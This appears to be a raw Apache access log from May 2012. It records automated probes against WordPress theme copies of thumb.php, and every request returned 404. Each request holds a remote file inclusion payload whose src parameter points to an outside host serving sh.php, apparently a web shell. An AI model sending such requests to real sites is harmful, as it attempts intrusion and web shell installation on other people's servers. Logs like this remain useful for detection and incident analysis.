173.203.144.195 - - [14/May/2012:03:53:58 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://wordpress.com.junglerumblepartyvenue.co.za/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.226.46.5 - - [14/May/2012:03:53:58 +0200] "GET //wp-content/themes/boldnews/scripts/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.226.46.5 - - [14/May/2012:03:53:58 +0200] "GET //wp-content/themes/boldnews/library/functions/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.226.46.5 - - [14/May/2012:03:53:58 +0200] "GET //wp-content/themes/boldnews/library/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.226.46.5 - - [14/May/2012:03:53:59 +0200] "GET //wp-content/themes/boldnews/library/resource/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.226.46.5 - - [14/May/2012:03:53:59 +0200] "GET //wp-content/themes/boldnews/library/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
